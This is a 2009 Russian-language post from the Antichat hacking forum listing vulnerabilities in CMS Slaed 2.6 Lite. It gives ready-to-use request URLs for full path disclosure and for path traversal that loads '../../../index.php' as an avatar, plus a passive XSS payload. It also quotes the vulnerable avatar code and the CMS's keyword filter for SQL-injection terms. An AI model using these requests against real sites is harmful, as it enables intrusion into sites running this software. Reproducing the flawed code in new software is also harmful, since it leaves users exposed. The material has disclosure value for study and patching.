ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #16  
Старый 01.11.2009, 14:28
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

CMS Slaed 2.6 Lite

Раскрытие путей

/index.php?name=Html_Content&op[]=page
/index.php?name=Account&op=info&uname[]=123

Уязвим файл /function/security.php

Код:
PHP код:
foreach ($_GET as $var_name=>$var_value) {
        if (
preg_match("/<.*?(script|body|object|iframe|applet|meta|style|form|img|onmouseover).*?>/i"urldecode($var_value)) || preg_match("/\([^>]*\"?[^)]*\)/"$var_value) || preg_match("/\"|\'/"$var_value)) warn_report("HTML in GET - ".$var_name." = "$var_value."");
        if (
$security_url_get == 1) {
            if (
preg_match("/^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)/i"$var_value)) warn_report("URL in GET - ".$var_name." = "$var_value);
        }
        
$security_string "/UNION|OUTFILE|SELECT|ALTER|INSERT|DROP|".$prefix."_admins|".$prefix."_users|ModAdmin|SaveAdmin|EditAdmin|DelAdmin/i";
        
$security_decode base64_decode($var_value);
        if (
preg_match($security_string$security_decode)) hack_report("Hack base64 in GET - ".$var_name." = "$var_value."");
        if (
preg_match($security_string$var_value)) hack_report("Hack in GET - ".$var_name." = "$var_value."");
        
$security_slash preg_replace("/\/\*.*?\*\//"""$var_value);
        if (
preg_match($security_string$security_slash)) hack_report("Hack in GET - ".$var_name." = "$var_value."");
    } 
Незнаю даже как назвать. Вообщем.

/index.php?name=Account&op=saveavatar&category=2&av atar=../../../index.php

и в аватарке будет загружатся index.php

Уязвимый код:

PHP код:
$user_avatar = ($userinfo['user_avatar'] && file_exists("".$adirectory."/".$userinfo['user_avatar']."")) ? "<img src=\"".$adirectory."/".$userinfo['user_avatar']."\" alt=\"$user_name\" title=\"$user_name\" />" "<img src=\"".$adirectory."/00.gif\" alt=\"$user_name\" title=\"$user_name\" />"
Возможно ещё что нибудь найду.

XSS (Пассивная)

//"><script>alert();</script>
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WCPS ] Dr.Z3r0 Сценарии/CMF/СMS 33 09.06.2010 14:53
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 42 07.05.2010 19:07
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
[ Обзор уязвимостей Exponent CMS ] ZAMUT Сценарии/CMF/СMS 1 02.02.2010 21:59
[ Обзор уязвимостей Gekko CMS ] Grey Сценарии/CMF/СMS 0 03.02.2008 20:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ